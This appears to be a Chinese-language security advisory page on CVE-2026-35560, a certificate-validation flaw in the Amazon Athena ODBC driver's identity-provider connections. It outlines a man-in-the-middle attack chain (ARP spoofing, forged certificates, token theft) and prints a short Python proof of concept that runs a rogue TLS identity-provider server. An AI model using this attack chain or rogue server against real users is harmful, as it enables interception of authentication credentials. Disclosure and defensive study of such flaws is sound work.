CVE-2026-35560 CVSS 7.4 高危

CVE-2026-35560 Amazon Athena ODBC驱动程序证书验证不当漏洞

披露日期: 2026-04-03

来源: ff89ba41-3aa1-4d27-914a-91399e9639e5

漏洞信息

漏洞编号

CVE-2026-35560

漏洞类型

证书验证不当

CVSS评分

7.4 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Amazon Athena ODBC driver

漏洞概述

Amazon Athena ODBC驱动程序在2.1.0.0之前的版本中，其身份提供商连接组件存在证书验证不当的漏洞。由于在连接外部身份提供商时默认传输安全性不足，攻击者可能利用此漏洞实施中间人攻击，从而拦截用户的身份验证凭据。值得注意的是，该问题仅适用于与外部身份提供商的连接，并不影响与Athena的直接连接。

技术细节

该漏洞的根本原因在于Amazon Athena ODBC驱动程序在建立与外部身份提供商的连接时，未能正确执行SSL/TLS证书验证机制。具体而言，受影响版本的驱动程序在默认配置下对传输层的安全性要求不足，可能存在接受自签名证书、忽略证书主机名不匹配或未验证证书链完整性等情况。这使得处于同一网络或能够控制路由的攻击者能够拦截客户端与IdP之间的通信流量。攻击者可以向客户端提供伪造的证书，由于驱动程序未进行严格校验，连接会被建立。在此过程中，用于身份验证的敏感凭据（如SAML断言或OAuth令牌）在传输过程中被攻击者解密并窃取，从而导致账户被接管的风险。此外，由于攻击完全发生在握手和认证阶段，用户可能难以察觉到异常，直到发现非授权的登录活动。

攻击链分析

STEP 1

步骤1：网络定位

攻击者定位到目标网络环境，该环境中存在使用受影响版本的Amazon Athena ODBC驱动程序且配置了外部身份提供商的主机。

STEP 2

步骤2：流量拦截

攻击者通过ARP欺骗、DNS投毒或控制网关等方式，将自己置于ODBC驱动程序与外部身份提供商之间的通信路径上，实施中间人攻击。

STEP 3

步骤3：证书欺骗

当驱动程序尝试连接IdP时，攻击者向驱动程序发送伪造的数字证书。由于驱动程序存在证书验证不当的漏洞，它接受了该无效证书并建立了连接。

STEP 4

步骤4：凭据窃取

攻击者解密拦截到的流量，获取其中包含的身份验证凭据（如SAML断言或OAuth令牌），进而利用这些凭据冒充合法用户访问系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import ssl
import socket
import threading

# Simulate a malicious Identity Provider (IdP) server
# This server uses a self-signed certificate to mimic a MitM scenario.
# A vulnerable driver would accept this certificate without warning.

HOST = '0.0.0.0'
PORT = 443

def handle_client(conn):
    print("[+] Connection intercepted from vulnerable driver")
    try:
        # Send fake authentication response
        conn.send(b"HTTP/1.1 200 OK\r\nContent-Type: application/json\r\n\r\n")
        conn.send(b'{"status": "authenticated", "token": "stolen_token_here"}')
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        conn.close()

# Create a socket with SSL context using a self-signed cert
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Note: In a real exploit, the attacker generates certs dynamically
context.load_cert_chain('server.crt', 'server.key') 

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.bind((HOST, PORT))
    s.listen(5)
    print(f"[*] Malicious IdP listening on {PORT}...")
    with context.wrap_socket(s, server_side=True) as ssl_sock:
        while True:
            conn, addr = ssl_sock.accept()
            threading.Thread(target=handle_client, args=(conn,)).start()

影响范围

Amazon Athena ODBC driver < 2.1.0.0

防御指南

临时缓解措施

如果无法立即升级驱动程序，建议限制ODBC驱动程序的网络访问权限，确保仅在受信任的私有网络环境或通过VPN隧道连接到身份提供商，以降低遭受中间人攻击的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表